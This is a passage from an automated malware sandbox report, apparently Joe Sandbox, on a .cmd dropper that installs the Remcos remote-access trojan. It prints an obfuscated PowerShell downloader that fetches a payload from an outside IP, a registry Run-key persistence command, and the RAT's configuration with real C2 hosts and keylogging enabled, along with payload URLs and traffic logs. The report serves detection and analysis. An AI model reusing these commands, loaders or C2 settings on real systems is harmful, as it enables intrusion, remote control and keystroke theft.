$Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8948, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ProcessId: 8992, ProcessName: reg.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8872, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ProcessId: 8948, ProcessName: cmd.exe
              Sigma detected: Suspicious Powershell In Registry Run Keys
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stagenes
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8048, ProcessName: svchost.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: jgbours284hawara01.duckdns.orgAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for domain / URL
              Source: jgbours284hawara01.duckdns.orgVirustotal: Detection: 15%Perma Link
              Source: www.duelvalenza.itVirustotal: Detection: 5%Perma Link
              Source: http://www.duelvalenza.it/Virustotal: Detection: 5%Perma Link
              Source: jgbours284hawara01.duckdns.orgVirustotal: Detection: 15%Perma Link
              Source: http://87.121.105.163Virustotal: Detection: 21%Perma Link
              Source: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/Virustotal: Detection: 6%Perma Link
              Multi AV Scanner detection for submitted file
              Source: Teklif talebi BAKVENTA-BAKUUsurpationens.cmdVirustotal: Detection: 9%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2275976188.00000000035BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007B15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdbpX) source: powershell.exe, 00000005.00000002.2306982846.0000000007B45000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb'$ source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: jgbours284hawara01.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: jgbours284hawara01.duckdns.org
              Source: unknownDNS query: name: jgbours284hawara02.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.4:49753 -> 45.88.90.110:3050
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 45.88.90.110 45.88.90.110
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: duelvalenza.itCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /Terminaljob.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: google.com
              Source: global trafficDNS traffic detected: DNS query: duelvalenza.it
              Source: global trafficDNS traffic detected: DNS query: www.duelvalenza.it
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 15:21:54 GMTServer: ApacheExpires: Mon, 26 Jul 1997 05:00:00 GMTCache-Control: post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: PHPSESSID=d979cfhj3obh8us97avdsfs160; path=/Set-Cookie: FrontSession=3c980817fa90cc22daee2c4e083b8971; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/Set-Cookie: FrontSession=7d75569e99f6cec2e2439fa4dd313439; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/Last-Modified: Thu, 02 May 2024 15:21:54 GMTVary: Accept-EncodingCache-Control: private, must-revalidateKeep-Alive: timeout=1, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html;charset=UTF-8Data Raw: 33 30 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 64 6f 63 75 6d 65 6e 74 2d 6c 6f 61 64 69 6e 67 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 3c 6d 65 74 61 20 63 6c 61 73 73 3d 76 69 65 77 70 6f 72 74 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76 61 6c 65 6e 7a 61 2e 69 74 2f 77 6e 6e 53 41 46 4d 57 50 77 44 58 47 79 39 35 2e 62 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 65 6e 5f 45 4e 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 Data Ascii: 3045<!DOCTYPE html><html lang=en class=document-loading><head><meta charset=UTF-8 /><meta class=viewport name=viewport content="width=device-width, initial-scale=1.0" /><meta name=format-detection content="telephone=no" /><meta http-equiv=X-UA-Compatible content="IE=edge" /><title>Page not found</title><meta name=description content="" /><meta property="og:title" content="Page not found" /><meta property="og:description" content="" /><meta property="og:url" content="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/" /><meta pro
              Source: powershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2384493968.00000210AD0A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
              Source: powershell.exe, 00000002.00000002.2384493968.00000210ACEBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Terminaljob.tocP
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Terminaljob.tocXRul
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/wnnSAFMWPwDXGy95.bin
              Source: powershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
              Source: powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microW
              Source: svchost.exe, 00000008.00000002.2883770137.000002087C800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000008.00000002.2883966985.000002087C887000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2884761464.000002087CB90000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2445853182.000002087CA22000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2883326968.0000020877D02000.00000004.00000020.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA6D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000008.00000002.2883966985.000002087C89A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
              Source: svchost.exe, 00000008.00000002.2883966985.000002087C887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
              Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp4
              Source: wab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp7
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp938=
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH=
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: wab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/k
              Source: powershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/
